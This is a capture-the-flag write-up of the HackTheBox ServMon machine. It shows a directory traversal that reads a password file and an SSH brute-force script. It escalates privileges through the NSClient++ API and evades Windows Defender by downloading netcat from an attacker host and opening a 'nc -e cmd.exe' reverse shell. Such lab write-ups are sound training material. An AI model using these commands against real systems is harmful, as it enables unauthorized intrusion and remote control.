HackTheBox ServMon Writeup

2/3/2024

Dive into the tactical journey of penetrating the ServMon machine on HackTheBox, a challenge designed for cybersecurity enthusiasts. This write-up unfolds the process of breaching a Windows-based server, leveraging a vulnerable NVMS-1000 setup. Discover how a meticulously crafted password-spraying tactic unlocks initial access, setting the stage for a deeper system exploration. The narrative progresses through strategic privilege escalation, utilizing NSClient++ weaknesses to gain ultimate control. This exploration not only demonstrates practical attack techniques but also some very basic windows-defender evasion.

Overview

A simple box that has some issues. There are issues with the web apps, Windows Defender was enabled causing some minor issues. However, it is simple nonetheless. A lot of reading the documentation for the application.

Enumeration

The IP of the machine is 10.10.10.184.

Nmap Scan

We start with the typical Ippsec scan.

nmap -sC -sV -oA nmap/ServMon 10.10.10.184

Nmap Scan

Interesting ports 21, 80, 139, 445, 8443

We can try anonymous FTP and SMB logins.

There are also two web apps that we can take a look at if those things don't work.

FTP Login (Port 21)

It works!

FTP Login

There are two files present in Users\Nadine\Confidential.txt and Users\Nathan\Notes to do.txt.

FTP Files

We know that there is a Passwords.txt file in Nathan's Desktop and it has not been removed.

Webserver (Port 80)

Website

We can see that it is running NVMS-1000. A quick Google search "NVMS-1000 exploits" gives us this CVE-2019-20085, a directory traversal exploit.

We can try to fish for the Passwords.txt file. We know that it is in Nathan's Desktop dir. So, Users/Nathan/Desktop/Passwords.txt

Directory Traversal

We get a list of passwords. We can try SSH but we do not which password maps to which user.

SSH Login (Port 22)

Let us create a quick users.txt and passwd.txt

Nathan Nadine administrator
1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$

Since I can't use Metasploit on the OSCP, I will write a quick SSH brute-force script.

import paramiko usernames_file = 'users.txt' passwords_file = 'passwd.txt' target_hostname = '10.10.10.184' port = 22 def attempt_login(hostname, port, username, password): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(hostname, port=port, username=username, password=password, timeout=10) print(f"Success: {username}:{password}") return True except paramiko.AuthenticationException: return False finally: client.close() with open(usernames_file, 'r') as uf: usernames = [line.strip() for line in uf] with open(passwords_file, 'r') as pf: passwords = [line.strip() for line in pf] for username in usernames: for password in passwords: if attempt_login(target_hostname, port, username, password): print(f"Valid credentials found: {username}:{password}") break
Valid credentials found: Nadine:L1k3B1gBut7s@W0rk

UserFile

Privilege Escalation

Now this is the part I was stuck on for a while, once I realized what I was missing I felt quite stupid.

We know that the server is running NSClient from the notes on Nathan's FTP directory.

We can find the directory that NSClient runs in C:\Program Files\NSClient++. Then we can check the version of the client.

nadine@SERVMON C:\Program Files\NSClient++>nscp --version NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

There is a Privilege Escalation exploit

The password for admin can be found in the nsclient.ini file.

Port forward the NSClient port

We need to access the NSClient from the attack machine. So let us port-forward using SSH.

ssh -L8443:127.0.0.1:8443 [email protected]

The challenge

So here is the challenge. Windows-defender was enabled. This was not the default configuration of the box; however, it will be a nice challenge.

So we get a Netcat executable and host a Python HTTP server.

python -m http.server 8000

Now let's try to get the file.

nadine@SERVMON C:\Program Files\NSClient++>certutil -urlcache -f http://10.10.14.15:8000/nc.exe nc.exe Access is denied.

At first, I thought I did not have write permissions. Which I thought was odd but I checked privileges and Nadine had write permissions.

Eventually, I switched to PowerShell and tried the same command.

PS C:\Program Files\NSClient++> certutil -urlcache -f http://10.10.10.184:8000/nc.exe nc.exe At line:1 char:1 + certutil -urlcache -f http://10.10.10.184:8000/nc.exe nc.exe + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent

I thought it was Netcat. (It was not).

So I tried to compile Netcat using C and changed a lot. Did not work. I tried to use a PowerShell reverse shell.

I tested the command on Nadine's shell. I had to use Powershell #3 from revshells.com. It worked on the shell. So I tried the WebUI and it did not work either. So I looked through the documentation and found the API.

Sent the requests to the API endpoint.

curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary @rev.bat curl -s -k -u admin:ew2x6SsGTxjRwXOT https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=10s

Still did not work! I was a bit worried. I started this box late during the day and I usually cannot sleep until I finish the box.

I decided to take a deep breath and look at what was happening and to my surprise, the http server did not get a request from the machine.

So the command itself was being blocked by the defender.

Solution

Let me try to wget in Powershell. Need to get the n64.exe binary. The regular binary gets removed by Windows Defender.

wget http://10.10.14.15:8000/nc64.exe -o nc.exe

Ok, that works.

Let us create a .bat file now.

C:\Users\Nadine\nc.exe 10.10.14.15 9002 -e cmd.exe

Now let's run the same commands with a listener.

nc -lvnp 9002

admin privs

Conclusion

Quite a fun box, Windows Defender made things tricky and forced me to do a ton of digging. However, once I figured out what to look out for the box became quite a breeze.